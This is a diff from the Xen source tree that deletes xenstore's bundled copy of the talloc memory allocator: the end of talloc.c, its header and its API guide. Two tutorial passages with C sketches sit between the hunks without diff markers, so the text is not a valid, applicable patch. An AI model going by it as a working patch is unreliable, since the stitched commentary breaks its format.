-{
-       if (count >= MAX_TALLOC_SIZE/el_size) {
-               return NULL;
-       }
-       return _talloc_zero(ctx, el_size * count, name);
-}
-
-
-/*
-  realloc an array, checking for integer overflow in the array size
-*/
-void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, unsigned count, const char *name)
-{
-       if (count >= MAX_TALLOC_SIZE/el_size) {
-               return NULL;
-       }
-       return _talloc_realloc(ctx, ptr, el_size * count, name);
-}
-
-/*
-  a function version of talloc_realloc(), so it can be passed as a function pointer
-  to libraries that want a realloc function (a realloc function encapsulates
-  all the basic capabilities of an allocation library, which is why this is useful)
-*/
-void *talloc_realloc_fn(const void *context, void *ptr, size_t size)
-{
-       return _talloc_realloc(context, ptr, size, NULL);
-}
-
-
-static void talloc_autofree(void)
-{
-       talloc_free(cleanup_context);
-       cleanup_context = NULL;
-}
-
-/*
-  return a context which will be auto-freed on exit
-  this is useful for reducing the noise in leak reports
-*/
-void *talloc_autofree_context(void)
-{
-       if (cleanup_context == NULL) {
-               cleanup_context = talloc_named_const(NULL, 0, "autofree_context");
-               atexit(talloc_autofree);
-       }
-       return cleanup_context;
-}
-
-size_t talloc_get_size(const void *context)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL)
-               return 0;
-
-       tc = talloc_chunk_from_ptr(context);
-
-       return tc->size;
-}
-
-/*
-  find a parent of this context that has the given name, if any
-*/
-void *talloc_find_parent_byname(const void *context, const char *name)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL) {
-               return NULL;
-       }
-
-       tc = talloc_chunk_from_ptr(context);
-       while (tc) {
-               if (tc->name && strcmp(tc->name, name) == 0) {
-                       return TC_PTR_FROM_CHUNK(tc);
-               }
-               while (tc && tc->prev) tc = tc->prev;
-               tc = tc->parent;
-       }
-       return NULL;
-}
-
-/*
-  show the parentage of a context
-*/
-void talloc_show_parents(const void *context, FILE *file)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL) {
-               fprintf(file, "talloc no parents for NULL\n");
-               return;
-       }
-
-       tc = talloc_chunk_from_ptr(context);
-       fprintf(file, "talloc parents of '%s'\n", talloc_get_name(context));
-       while (tc) {
-               fprintf(file, "\t'%s'\n", talloc_get_name(TC_PTR_FROM_CHUNK(tc)));
-               while (tc && tc->prev) tc = tc->prev;
-               tc = tc->parent;
-       }
-}
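For readers who want to see the measure-then-format pattern from the removed talloc_vasprintf() in isolation, here is a minimal sketch. It is an illustration only, not code from the patch: the names format_alloc() and format_alloc_v() are hypothetical, plain malloc() stands in for the talloc allocator, and it assumes a C99 vsnprintf() that returns the required length when called with a NULL buffer of size 0. Unlike the removed code, each va_copy() here is paired with a va_end().

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper (not part of talloc): format into a malloc()ed buffer. */
static char *format_alloc_v(const char *fmt, va_list ap)
{
    va_list ap2;
    int len;
    char *ret;

    assert(fmt != NULL);

    /* First pass: measure only. A copy is used because the va_list is
     * indeterminate once vsnprintf() has consumed it. */
    va_copy(ap2, ap);
    len = vsnprintf(NULL, 0, fmt, ap2);
    va_end(ap2);
    if (len < 0)
        return NULL;

    ret = malloc((size_t)len + 1);
    if (ret == NULL)
        return NULL;

    /* Second pass: format into the exactly sized buffer. */
    va_copy(ap2, ap);
    vsnprintf(ret, (size_t)len + 1, fmt, ap2);
    va_end(ap2);

    return ret;
}

/* Variadic front end, mirroring how talloc_asprintf() wraps talloc_vasprintf(). */
static char *format_alloc(const char *fmt, ...)
{
    va_list ap;
    char *ret;

    va_start(ap, fmt);
    ret = format_alloc_v(fmt, ap);
    va_end(ap);
    return ret;
}
```

A caller would write something like format_alloc("%s=%d", "id", 42) and release the result with free(). In the talloc version the result is instead attached to a parent context and released along with it.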
diff -r 10a8fae412c5 tools/xenstore/talloc.h
--- a/tools/xenstore/talloc.h   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,144 +0,0 @@
-#ifndef _TALLOC_H_
-#define _TALLOC_H_
-/* 
-   Unix SMB/CIFS implementation.
-   Samba temporary memory allocation functions
-
-   Copyright (C) Andrew Tridgell 2004-2005
-   
-     ** NOTE! The following LGPL license applies to the talloc
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-   
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-/* this is only needed for compatibility with the old talloc */
-typedef void TALLOC_CTX;
-
-/*
-  this uses a little trick to allow __LINE__ to be stringified
-*/
-#define _STRING_LINE_(s)    #s
-#define _STRING_LINE2_(s)   _STRING_LINE_(s)
-#define __LINESTR__       _STRING_LINE2_(__LINE__)
-#define __location__ __FILE__ ":" __LINESTR__
-
-#ifndef TALLOC_DEPRECATED
-#define TALLOC_DEPRECATED 0
-#endif
-
-/* useful macros for creating type checked pointers */
-#define talloc(ctx, type) (type *)talloc_named_const(ctx, sizeof(type), #type)
-#define talloc_size(ctx, size) talloc_named_const(ctx, size, __location__)
-
-#define talloc_new(ctx) talloc_named_const(ctx, 0, "talloc_new: " __location__)
-
-#define talloc_zero(ctx, type) (type *)_talloc_zero(ctx, sizeof(type), #type)
-#define talloc_zero_size(ctx, size) _talloc_zero(ctx, size, __location__)
-
-#define talloc_zero_array(ctx, type, count) (type *)_talloc_zero_array(ctx, sizeof(type), count, #type)
-#define talloc_array(ctx, type, count) (type *)_talloc_array(ctx, sizeof(type), count, #type)
-#define talloc_array_size(ctx, size, count) _talloc_array(ctx, size, count, __location__)
-
-#define talloc_realloc(ctx, p, type, count) (type *)_talloc_realloc_array(ctx, p, sizeof(type), count, #type)
-#define talloc_realloc_size(ctx, ptr, size) _talloc_realloc(ctx, ptr, size, __location__)
-
-#define talloc_memdup(t, p, size) _talloc_memdup(t, p, size, __location__)
-
-#define malloc_p(type) (type *)malloc(sizeof(type))
-#define malloc_array_p(type, count) (type *)realloc_array(NULL, sizeof(type), count)
-#define realloc_p(p, type, count) (type *)realloc_array(p, sizeof(type), count)
-
-#if 0 
-/* Not correct for Samba3. */
-#define data_blob(ptr, size) data_blob_named(ptr, size, "DATA_BLOB: "__location__)
-#define data_blob_talloc(ctx, ptr, size) data_blob_talloc_named(ctx, ptr, size, "DATA_BLOB: "__location__)
-#define data_blob_dup_talloc(ctx, blob) data_blob_talloc_named(ctx, (blob)->data, (blob)->length, "DATA_BLOB: "__location__)
-#endif
-
-#define talloc_set_type(ptr, type) talloc_set_name_const(ptr, #type)
-#define talloc_get_type(ptr, type) (type *)talloc_check_name(ptr, #type)
-
-#define talloc_find_parent_bytype(ptr, type) (type *)talloc_find_parent_byname(ptr, #type)
-
-
-#if TALLOC_DEPRECATED
-#define talloc_zero_p(ctx, type) talloc_zero(ctx, type)
-#define talloc_p(ctx, type) talloc(ctx, type)
-#define talloc_array_p(ctx, type, count) talloc_array(ctx, type, count)
-#define talloc_realloc_p(ctx, p, type, count) talloc_realloc(ctx, p, type, count)
-#define talloc_destroy(ctx) talloc_free(ctx)
-#endif
-
-#ifndef PRINTF_ATTRIBUTE
-#if (__GNUC__ >= 3)
-/** Use gcc attribute to check printf fns.  a1 is the 1-based index of
- * the parameter containing the format, and a2 the index of the first
- * argument. Note that some gcc 2.x versions don't handle this
- * properly **/
-#define PRINTF_ATTRIBUTE(a1, a2) __attribute__ ((format (__printf__, a1, a2)))
-#else
-#define PRINTF_ATTRIBUTE(a1, a2)
-#endif
-#endif
-
-
-/* The following definitions come from talloc.c  */
-void *_talloc(const void *context, size_t size);
-void talloc_set_destructor(const void *ptr, int (*destructor)(void *));
-void talloc_increase_ref_count(const void *ptr);
-void *talloc_reference(const void *context, const void *ptr);
-int talloc_unlink(const void *context, void *ptr);
-void talloc_set_name(const void *ptr, const char *fmt, ...) PRINTF_ATTRIBUTE(2,3);
-void talloc_set_name_const(const void *ptr, const char *name);
-void *talloc_named(const void *context, size_t size, 
-                  const char *fmt, ...) PRINTF_ATTRIBUTE(3,4);
-void *talloc_named_const(const void *context, size_t size, const char *name);
-const char *talloc_get_name(const void *ptr);
-void *talloc_check_name(const void *ptr, const char *name);
-void talloc_report_depth(const void *ptr, FILE *f, int depth);
-void *talloc_parent(const void *ptr);
-void *talloc_init(const char *fmt, ...) PRINTF_ATTRIBUTE(1,2);
-int talloc_free(void *ptr);
-void *_talloc_realloc(const void *context, void *ptr, size_t size, const char *name);
-void *talloc_steal(const void *new_ctx, const void *ptr);
-off_t talloc_total_size(const void *ptr);
-off_t talloc_total_blocks(const void *ptr);
-void talloc_report_full(const void *ptr, FILE *f);
-void talloc_report(const void *ptr, FILE *f);
-void talloc_enable_null_tracking(void);
-void talloc_enable_leak_report(void);
-void talloc_enable_leak_report_full(void);
-void *_talloc_zero(const void *ctx, size_t size, const char *name);
-void *_talloc_memdup(const void *t, const void *p, size_t size, const char *name);
-char *talloc_strdup(const void *t, const char *p);
-char *talloc_strndup(const void *t, const char *p, size_t n);
-char *talloc_append_string(const void *t, char *orig, const char *append);
-char *talloc_vasprintf(const void *t, const char *fmt, va_list ap) PRINTF_ATTRIBUTE(2,0);
-char *talloc_asprintf(const void *t, const char *fmt, ...) PRINTF_ATTRIBUTE(2,3);
-char *talloc_asprintf_append(char *s,
-                            const char *fmt, ...) PRINTF_ATTRIBUTE(2,3);
-void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const char *name);
-void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, const char *name);
-void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, unsigned count, const char *name);
-void *talloc_realloc_fn(const void *context, void *ptr, size_t size);
-void *talloc_autofree_context(void);
-size_t talloc_get_size(const void *ctx);
-void *talloc_find_parent_byname(const void *ctx, const char *name);
-void talloc_show_parents(const void *context, FILE *file);
-
-#endif
-
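The "little trick" that the removed talloc.h uses to build __location__ relies on two levels of macro expansion. The sketch below shows it in isolation. It is only an illustration: the macro names STRINGIFY_RAW, STRINGIFY and LOCATION and the helper location_line() are hypothetical, chosen to avoid the reserved double-underscore identifiers the original header uses.

```c
#include <assert.h>
#include <string.h>

/* One level of # stringifies the argument as written, without expanding it. */
#define STRINGIFY_RAW(s) #s
/* The extra level lets the argument expand first, so __LINE__ becomes its number. */
#define STRINGIFY(s)     STRINGIFY_RAW(s)
/* Adjacent string literals are concatenated by the compiler: "file.c" ":" "42". */
#define LOCATION         __FILE__ ":" STRINGIFY(__LINE__)

/* Hypothetical helper: return the text after the last ':' in a location
 * string, which is the line-number part. */
static const char *location_line(const char *location)
{
    const char *colon = strrchr(location, ':');

    assert(colon != NULL);
    return colon + 1;
}
```

Using STRINGIFY_RAW(__LINE__) directly would yield the literal text "__LINE__", which is why the header defines two macros rather than one. The resulting string is a compile-time constant, so it can be handed to a function such as talloc_named_const() without any allocation.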
diff -r 10a8fae412c5 tools/xenstore/talloc_guide.txt
--- a/tools/xenstore/talloc_guide.txt   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,569 +0,0 @@
-Using talloc in Samba4
-----------------------
-
-Andrew Tridgell
-September 2004
-
-The most current version of this document is available at
-   http://samba.org/ftp/unpacked/samba4/source/lib/talloc/talloc_guide.txt
-
-If you are used to talloc from Samba3 then please read this carefully,
-as talloc has changed a lot.
-
-The new talloc is a hierarchical, reference counted memory pool system
-with destructors. Quite a mounthful really, but not too bad once you
-get used to it.
-
-Perhaps the biggest change from Samba3 is that there is no distinction
-between a "talloc context" and a "talloc pointer". Any pointer
-returned from talloc() is itself a valid talloc context. This means
-you can do this:
-
-  struct foo *X = talloc(mem_ctx, struct foo);
-  X->name = talloc_strdup(X, "foo");
-
-and the pointer X->name would be a "child" of the talloc context "X"
-which is itself a child of mem_ctx. So if you do talloc_free(mem_ctx)
-then it is all destroyed, whereas if you do talloc_free(X) then just X
-and X->name are destroyed, and if you do talloc_free(X->name) then
-just the name element of X is destroyed.
-
-If you think about this, then what this effectively gives you is an
-n-ary tree, where you can free any part of the tree with
-talloc_free().
-
-If you find this confusing, then I suggest you run the testsuite to
-watch talloc in action. You may also like to add your own tests to
-testsuite.c to clarify how some particular situation is handled.
-
-
-Performance
------------
-
-All the additional features of talloc() over malloc() do come at a
-price. We have a simple performance test in Samba4 that measures
-talloc() versus malloc() performance, and it seems that talloc() is
-about 10% slower than malloc() on my x86 Debian Linux box. For Samba,
-the great reduction in code complexity that we get by using talloc
-makes this worthwhile, especially as the total overhead of
-talloc/malloc in Samba is already quite small.
-
-
-talloc API
-----------
-
-The following is a complete guide to the talloc API. Read it all at
-least twice.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc(const void *context, type);
-
-The talloc() macro is the core of the talloc library. It takes a
-memory context and a type, and returns a pointer to a new area of
-memory of the given type.
-
-The returned pointer is itself a talloc context, so you can use it as
-the context argument to more calls to talloc if you wish.
-
-The returned pointer is a "child" of the supplied context. This means
-that if you talloc_free() the context then the new child disappears as
-well. Alternatively you can free just the child.
-
-The context argument to talloc() can be NULL, in which case a new top
-level context is created. 
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_size(const void *context, size_t size);
-
-The function talloc_size() should be used when you don't have a
-convenient type to pass to talloc(). Unlike talloc(), it is not type
-safe (as it returns a void *), so you are on your own for type checking.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-int talloc_free(void *ptr);
-
-The talloc_free() function frees a piece of talloc memory, and all its
-children. You can call talloc_free() on any pointer returned by
-talloc().
-
-The return value of talloc_free() indicates success or failure, with 0
-returned for success and -1 for failure. The only possible failure
-condition is if the pointer had a destructor attached to it and the
-destructor returned -1. See talloc_set_destructor() for details on
-destructors.
-
-If this pointer has an additional parent when talloc_free() is called
-then the memory is not actually released, but instead the most
-recently established parent is destroyed. See talloc_reference() for
-details on establishing additional parents.
-
-For more control on which parent is removed, see talloc_unlink()
-
-talloc_free() operates recursively on its children.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-int talloc_free_children(void *ptr);
-
-The talloc_free_children() walks along the list of all children of a
-talloc context and talloc_free()s only the children, not the context
-itself.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_reference(const void *context, const void *ptr);
-
-The talloc_reference() function makes "context" an additional parent
-of "ptr".
-
-The return value of talloc_reference() is always the original pointer
-"ptr", unless talloc ran out of memory in creating the reference in
-which case it will return NULL (each additional reference consumes
-around 48 bytes of memory on intel x86 platforms).
-
-If "ptr" is NULL, then the function is a no-op, and simply returns NULL.
-
-After creating a reference you can free it in one of the following
-ways:
-
-  - you can talloc_free() any parent of the original pointer. That
-    will reduce the number of parents of this pointer by 1, and will
-    cause this pointer to be freed if it runs out of parents.
-
-  - you can talloc_free() the pointer itself. That will destroy the
-    most recently established parent to the pointer and leave the
-    pointer as a child of its current parent.
-
-For more control on which parent to remove, see talloc_unlink()
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-int talloc_unlink(const void *context, const void *ptr);
-
-The talloc_unlink() function removes a specific parent from ptr. The
-context passed must either be a context used in talloc_reference()
-with this pointer, or must be a direct parent of ptr. 
-
-Note that if the parent has already been removed using talloc_free()
-then this function will fail and will return -1.  Likewise, if "ptr"
-is NULL, then the function will make no modifications and return -1.
-
-Usually you can just use talloc_free() instead of talloc_unlink(), but
-sometimes it is useful to have the additional control on which parent
-is removed.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_set_destructor(const void *ptr, int (*destructor)(void *));
-
-The function talloc_set_destructor() sets the "destructor" for the
-pointer "ptr". A destructor is a function that is called when the
-memory used by a pointer is about to be released. The destructor
-receives the pointer as an argument, and should return 0 for success
-and -1 for failure.
-
-The destructor can do anything it wants to, including freeing other
-pieces of memory. A common use for destructors is to clean up
-operating system resources (such as open file descriptors) contained
-in the structure the destructor is placed on.
-
-You can only place one destructor on a pointer. If you need more than
-one destructor then you can create a zero-length child of the pointer
-and place an additional destructor on that.
-
-To remove a destructor call talloc_set_destructor() with NULL for the
-destructor.
-
-If your destructor attempts to talloc_free() the pointer that it is
-the destructor for then talloc_free() will return -1 and the free will
-be ignored. This would be a pointless operation anyway, as the
-destructor is only called when the memory is just about to go away.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_increase_ref_count(const void *ptr);
-
-The talloc_increase_ref_count(ptr) function is exactly equivalent to:
-
-  talloc_reference(NULL, ptr);
-
-You can use either syntax, depending on which you think is clearer in
-your code.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_set_name(const void *ptr, const char *fmt, ...);
-
-Each talloc pointer has a "name". The name is used principally for
-debugging purposes, although it is also possible to set and get the
-name on a pointer in as a way of "marking" pointers in your code.
-
-The main use for names on pointer is for "talloc reports". See
-talloc_report() and talloc_report_full() for details. Also see
-talloc_enable_leak_report() and talloc_enable_leak_report_full().
-
-The talloc_set_name() function allocates memory as a child of the
-pointer. It is logically equivalent to:
-  talloc_set_name_const(ptr, talloc_asprintf(ptr, fmt, ...));
-
-Note that multiple calls to talloc_set_name() will allocate more
-memory without releasing the name. All of the memory is released when
-the ptr is freed using talloc_free().
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_set_name_const(const void *ptr, const char *name);
-
-The function talloc_set_name_const() is just like talloc_set_name(),
-but it takes a string constant, and is much faster. It is extensively
-used by the "auto naming" macros, such as talloc_p().
-
-This function does not allocate any memory. It just copies the
-supplied pointer into the internal representation of the talloc
-ptr. This means you must not pass a name pointer to memory that will
-disappear before the ptr is freed with talloc_free().
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_named(const void *context, size_t size, const char *fmt, ...);
-
-The talloc_named() function creates a named talloc pointer. It is
-equivalent to:
-
-   ptr = talloc_size(context, size);
-   talloc_set_name(ptr, fmt, ....);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_named_const(const void *context, size_t size, const char *name);
-
-This is equivalent to:
-
-   ptr = talloc_size(context, size);
-   talloc_set_name_const(ptr, name);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-const char *talloc_get_name(const void *ptr);
-
-This returns the current name for the given talloc pointer. See
-talloc_set_name() for details.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_init(const char *fmt, ...);
-
-This function creates a zero length named talloc context as a top
-level context. It is equivalent to:
-
-  talloc_named(NULL, 0, fmt, ...);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_new(void *ctx);
-
-This is a utility macro that creates a new memory context hanging
-off an exiting context, automatically naming it "talloc_new: __location__"
-where __location__ is the source line it is called from. It is
-particularly useful for creating a new temporary working context.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_realloc(const void *context, void *ptr, type, count);
-
-The talloc_realloc() macro changes the size of a talloc
-pointer. The "count" argument is the number of elements of type "type"
-that you want the resulting pointer to hold. 
-
-talloc_realloc() has the following equivalences:
-
-  talloc_realloc(context, NULL, type, 1) ==> talloc(context, type);
-  talloc_realloc(context, NULL, type, N) ==> talloc_array(context, type, N);
-  talloc_realloc(context, ptr, type, 0)  ==> talloc_free(ptr);
-
-The "context" argument is only used if "ptr" is not NULL, otherwise it
-is ignored.
-
-talloc_realloc() returns the new pointer, or NULL on failure. The call
-will fail either due to a lack of memory, or because the pointer has
-more than one parent (see talloc_reference()).
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_realloc_size(const void *context, void *ptr, size_t size);
-
-the talloc_realloc_size() function is useful when the type is not 
-known so the typesafe talloc_realloc() cannot be used.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_steal(const void *new_ctx, const void *ptr);
-
-The talloc_steal() function changes the parent context of a talloc
-pointer. It is typically used when the context that the pointer is
-currently a child of is going to be freed and you wish to keep the
-memory for a longer time. 
-
-The talloc_steal() function returns the pointer that you pass it. It
-does not have any failure modes.
-
-NOTE: It is possible to produce loops in the parent/child relationship
-if you are not careful with talloc_steal(). No guarantees are provided
-as to your sanity or the safety of your data if you do this.
-
-talloc_steal (new_ctx, NULL) will return NULL with no sideeffects.
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-off_t talloc_total_size(const void *ptr);
-
-The talloc_total_size() function returns the total size in bytes used
-by this pointer and all child pointers. Mostly useful for debugging.
-
-Passing NULL is allowed, but it will only give a meaningful result if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-off_t talloc_total_blocks(const void *ptr);
-
-The talloc_total_blocks() function returns the total memory block
-count used by this pointer and all child pointers. Mostly useful for
-debugging.
-
-Passing NULL is allowed, but it will only give a meaningful result if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_report(const void *ptr, FILE *f);
-
-The talloc_report() function prints a summary report of all memory
-used by ptr. One line of report is printed for each immediate child of
-ptr, showing the total memory and number of blocks used by that child.
-
-You can pass NULL for the pointer, in which case a report is printed
-for the top level memory context, but only if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_report_full(const void *ptr, FILE *f);
-
-This provides a more detailed report than talloc_report(). It will
-recursively print the ensire tree of memory referenced by the
-pointer. References in the tree are shown by giving the name of the
-pointer that is referenced.
-
-You can pass NULL for the pointer, in which case a report is printed
-for the top level memory context, but only if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_enable_leak_report(void);
-
-This enables calling of talloc_report(NULL, stderr) when the program
-exits. In Samba4 this is enabled by using the --leak-report command
-line option.
-
-For it to be useful, this function must be called before any other
-talloc function as it establishes a "null context" that acts as the
-top of the tree. If you don't call this function first then passing
-NULL to talloc_report() or talloc_report_full() won't give you the
-full tree printout.
-
-Here is a typical talloc report:
-
-talloc report on 'null_context' (total 267 bytes in 15 blocks)
-        libcli/auth/spnego_parse.c:55  contains     31 bytes in   2 blocks
-        libcli/auth/spnego_parse.c:55  contains     31 bytes in   2 blocks
-        iconv(UTF8,CP850)              contains     42 bytes in   2 blocks
-        libcli/auth/spnego_parse.c:55  contains     31 bytes in   2 blocks
-        iconv(CP850,UTF8)              contains     42 bytes in   2 blocks
-        iconv(UTF8,UTF-16LE)           contains     45 bytes in   2 blocks
-        iconv(UTF-16LE,UTF8)           contains     45 bytes in   2 blocks
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_enable_leak_report_full(void);
-
-This enables calling of talloc_report_full(NULL, stderr) when the
-program exits. In Samba4 this is enabled by using the
---leak-report-full command line option.
-
-For it to be useful, this function must be called before any other
-talloc function as it establishes a "null context" that acts as the
-top of the tree. If you don't call this function first then passing
-NULL to talloc_report() or talloc_report_full() won't give you the
-full tree printout.
-
-Here is a typical full report:
-
-full talloc report on 'root' (total 18 bytes in 8 blocks)
-    p1                             contains     18 bytes in   7 blocks (ref 0)
-        r1                             contains     13 bytes in   2 blocks (ref 0)
-            reference to: p2
-        p2                             contains      1 bytes in   1 blocks (ref 1)
-        x3                             contains      1 bytes in   1 blocks (ref 0)
-        x2                             contains      1 bytes in   1 blocks (ref 0)
-        x1                             contains      1 bytes in   1 blocks (ref 0)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_enable_null_tracking(void);
-
-This enables tracking of the NULL memory context without enabling leak
-reporting on exit. Useful for when you want to do your own leak
-reporting call via talloc_report_null_full();
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_zero(const void *ctx, type);
-
-The talloc_zero() macro is equivalent to:
-
-  ptr = talloc(ctx, type);
-  if (ptr) memset(ptr, 0, sizeof(type));
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_zero_size(const void *ctx, size_t size)
-
-The talloc_zero_size() function is useful when you don't have a known type
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_memdup(const void *ctx, const void *p, size_t size);
-
-The talloc_memdup() function is equivalent to:
-
-  ptr = talloc_size(ctx, size);
-  if (ptr) memcpy(ptr, p, size);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_strdup(const void *ctx, const char *p);
-
-The talloc_strdup() function is equivalent to:
-
-  ptr = talloc_size(ctx, strlen(p)+1);
-  if (ptr) memcpy(ptr, p, strlen(p)+1);
-
-This functions sets the name of the new pointer to the passed
-string. This is equivalent to:
-   talloc_set_name_const(ptr, ptr)
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_strndup(const void *t, const char *p, size_t n);
-
-The talloc_strndup() function is the talloc equivalent of the C
-library function strndup()
-
-This functions sets the name of the new pointer to the passed
-string. This is equivalent to:
-   talloc_set_name_const(ptr, ptr)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_vasprintf(const void *t, const char *fmt, va_list ap);
-
-The talloc_vasprintf() function is the talloc equivalent of the C
-library function vasprintf()
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_asprintf(const void *t, const char *fmt, ...);
-
-The talloc_asprintf() function is the talloc equivalent of the C
-library function asprintf()
-
-This functions sets the name of the new pointer to the passed
-string. This is equivalent to:
-   talloc_set_name_const(ptr, ptr)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_asprintf_append(char *s, const char *fmt, ...);
-
-The talloc_asprintf_append() function appends the given formatted 
-string to the given string. 
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_array(const void *ctx, type, uint_t count);
-
-The talloc_array() macro is equivalent to:
-
-  (type *)talloc_size(ctx, sizeof(type) * count);
-
-except that it provides integer overflow protection for the multiply,
-returning NULL if the multiply overflows.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_array_size(const void *ctx, size_t size, uint_t count);
-
-The talloc_array_size() function is useful when the type is not
-known. It operates in the same way as talloc_array(), but takes a size
-instead of a type.
-
-
